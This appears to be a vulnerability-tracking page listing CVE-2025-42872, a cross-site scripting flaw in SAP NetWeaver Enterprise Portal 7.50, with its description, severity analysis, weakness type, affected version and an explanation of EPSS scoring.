XSS in SAP NetWeaver Enterprise Portal (CVE-2025-42872) - Cookie Theft
CVE-2025-42872 Published on December 9, 2025
Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal
Due to a Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal, an unauthenticated attacker could inject malicious scripts that execute in the context of other users browsers, allowing the attacker to steal session cookies, tokens, and other sensitive information. As a result, the vulnerability has a low impact on confidentiality and integrity and no impact on availability.
Vulnerability Analysis
CVE-2025-42872 is exploitable with network access, requires user interaction. This vulnerability is considered to have a low attack complexity. The potential impact of an exploit of this vulnerability is considered to have a small impact on confidentiality and integrity, and no impact on availability.
Weakness Type
Active Debug Code
The application is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information. A common development practice is to add "back door" code specifically designed for debugging or testing purposes that is not intended to be shipped or deployed with the application. These back door entry points create security risks because they are not considered during design or testing and fall outside of the expected operating conditions of the application.
Products Associated with CVE-2025-42872
Want to know whenever a new CVE is published for SAP Netweaver Enterprise Portal? stack.watch will email you.
Affected Versions
SAP_SE SAP NetWeaver Enterprise Portal Version EP-RUNTIME 7.50 is affected by CVE-2025-42872Exploit Probability
EPSS (Exploit Prediction Scoring System) scores estimate the probability that a vulnerability will be exploited in the wild within the next 30 days. The percentile shows you how this score compares to all other vulnerabilities.